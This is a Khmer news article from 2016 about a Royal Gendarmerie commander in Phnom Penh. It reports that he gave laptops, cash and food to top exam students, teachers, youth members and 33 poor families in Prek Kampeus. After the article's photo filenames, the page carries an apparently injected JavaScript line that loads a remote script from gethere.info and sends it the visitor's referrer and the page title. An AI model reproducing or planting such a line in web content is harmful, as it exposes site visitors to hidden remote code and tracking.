ពិតជាសំណាងមែន! ទាំងនិទ្ទេសA និងB ទទួលបានការលើកទឹកចិត្តពីណាក់ លោកឧត្តមសេនីយ៍ឯក រ័ត្ន ស្រ៊ាង

ភ្នំពេញ៖ នៅព្រឹកថ្ងៃទី17-9-2016 ឯកឧត្តម ឧត្តមសេនីយ៍ឯក រ័ត្ន ស្រ៊ាង មេបញ្ជាការរង កងរាជអាវុធហត្ថលើផ្ទៃប្រទេស និងជាមេញ្ជាការកងរាជអាវុធហត្ថរាជធានីភ្នំពេញអមដំណើរដោយ លោក នុត ពុធដារ៉ា អភិបាលនៃគណៈអភិបាលខណ្ឌដង្កោ មន្ត្រីមូលដ្ឋាន ខណ្ឌ សង្កាត់ ភូមិ ក្រុមយុវជន និងសហការីជាច្រើនរូបផ្សេងទៀត បាននាំយកនូវរង្វាន់លើកទឹកចិត្តទៅចែកជូនដល់សិស្សដែលទទួលបាននិទ្ទេសល្អក្នុងការប្រឡងសញ្ញាបត្រមធ្យមសិក្សាទុតិយភូមិ និងសញ្ញាបត្រមធ្យមសិក្សាបឋមភូមិ ឆ្នាំសិក្សា 2015-2016 ព្រមទាំងឆ្លៀតនាំយកអំណោយចែកជូនដល់គ្រួសារទុគ៌តជនចំនួន33គ្រួសារ ក្នុងសង្កាត់ព្រែកកំពឹស ខណ្ឌដង្កោផងដែរ ។

សិស្សជ័យលាភីចំនួន05នាក់ រួមមាន៖
សញ្ញាបត្រមធ្យមសិក្សាទុតិយភូមិ ចំនួន៣នាក់គឺ ៖
1- ឈ្មោះ វៃ រ៉ានី ភេទស្រី និទ្ទេសA ទទួលបានម៉ូតូម៉ាកហុងដាC125 ស៊េរីឆ្នាំ2016ចំនួន01គ្រឿង +កុំព្យូទ័រយួរដៃ01គ្រឿង + កាបូបស្ពាយ01។
2- ឈ្មោះ ព្រឿង លីដា ភេទប្រុស និទ្ទេសB និង
3- ឈ្មោះ សិដ្ឋ ពិសី ភេទប្រុស និទ្ទេសB ក្នុងម្នាក់ៗទទួលបាន កុំព្យូទ័រយួរដៃម្នាក់01គ្រឿង +ថវិកាម្នាក់40ម៉ឺនរៀល កាបូបស្ពាយម្នាក់01។
សញ្ញាបត្រមធ្យមសិក្សាបឋមភូមិចំនួន២នាក់គឺ ៖
1- ឈ្មោះ ម៉ារិន្ទ រ័ត្ន នីកា ភេទស្រី លេខ1 ទទួលបានកុំព្យូទ័រយួរដៃ01គ្រឿង+ថវិកា40ម៉ឺនរៀល + កាបូបស្ពាយ01។
2- ឈ្មោះ ដន សុវណ្ណតារ៉ា លេខ2 ទទួលបានកុំព្យូទ័រយួរដៃ01គ្រឿង + កាបូបស្ពាយ01។
ដោយឡែកទុគ៌តជនទាំង33គ្រួសារ ក្នុង01គ្រួសារទទួលបានអង្ករ02ការ៉ុង, ទឹកត្រី.ទឹកស៊ីអ៊ីវ02យួរ,ត្រីខកំប៉ុង01យួរ,ទឹកសុទ្ធ01កេស និងថវិកា5ម៉ឺនរៀល ។


អ្វីដែលគួឲ្យកត់សម្គាល់ផងដែរនោះ គឺឯកឧត្តម រ័ត្ន ស្រ៊ាង បាននាំយកនំបុ័ងចំនួន600ដើម  ការ៉េម600ដើម  ទឹកសុទ្ធ600ដប ចែកជូននិងហូបចុករួមជាមួយប្អូនៗសិស្សានុសិស្ស យុវជន យុវនារី លោកគ្រូ អ្នកគ្រូ លោកយាយ លោកតា និងសមាជិកចូលរួមក្នុងអង្គពិធីទាំងមូល ប្រកបដោយមនោសញ្ចេតនាស្និទ្ធស្នាលកក់ក្តៅ ជាគ្រួសារខ្មែរតែមួយ។ បន្ថែមពីលើនេះទៀត ឯកឧត្តម រ័ត្ន ស្រ៊ាង បានចែកថវិកាជូនដល់ ៖
– លោកគ្រូ អ្នកគ្រូចំនួន 50នាក់ ក្នុងម្នាក់ៗទទួលបាន2ម៉ឺនរៀល
– សមាជិកយុវជនភូមិ សង្កាត់ចំនួន 20នាក់ ក្នុងម្នាក់ៗទទួលបាន1ម៉ឺនរៀល
– ចេញថ្លៃកាត់អាវឯកសណ្ឋានឲ្យសមាជិកយុវជនភូមិចំនួន18នាក់ ក្នុងអាវ01តម្លៃ41000៛
– ជូនដល់អង្គភាព អហ ខណ្ឌដង្កោ = 20ម៉ឺនរៀល
– ជូនដល់អង្គភាព នគរបាលប៉ុស្តិ៍ = 20ម៉ឺនរៀល
– ជូនដល់អង្គភាព ប្រជាការពារសង្កាត់= 20ម៉ឺនរៀល
– ក្រុមរបាំឆៃយ៉ាំប្រចាំវិទ្យាល័យសម្តេច ហ៊ុន សែន ព្រែកកំពឹស = 20ម៉ឺនរៀលក្នុងឱកាសនោះផងដែរឯកឧត្តម រ័ត្ន ស្រ៊ាង ក៏បានជួបស្ត្រីម្នាក់ឈ្មោះ ស៊ុន សុខុម អាយុ50ឆ្នាំ រស់នៅភូមិក្រាំងស្វាយ សង្កាត់ព្រែកកំពឹស ដែលមានអាការៈងងឹតភ្នែកទាំងសងខាងរយៈពេលជាងមួយឆ្នាំហើយ ដោយពុំធ្លាប់បានទៅឲ្យគ្រូពេទ្យពិនិត្យនៅឡើយ ឯកឧត្តមក៏បានចាត់ឲ្យក្រុមគ្រូពេទ្យរបស់កងរាជអាវុធហត្ថរាជធានីភ្នំពេញ ចុះទៅពិនិត្យអាការៈរោគ ប្រសិនបើអាចធ្វើការវះកាត់ព្យាបាលឲ្យមើលឃើញឡើងវិញបាន ឯកឧត្តម រ័ត្ន ស្រ៊ាង ធានាចេញថ្លៃវះកាត់ព្យាបាលទាំងស្រុង ។

14292380_626311447543688_5410170180073958579_n 14330092_626311604210339_2638993344930256568_n 14359028_626311600877006_7675344352131514936_n 14359213_626311574210342_4017518615783142810_n 14364821_626311397543693_8508117978440287872_n 14390877_626311390877027_7158032213006396605_n

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More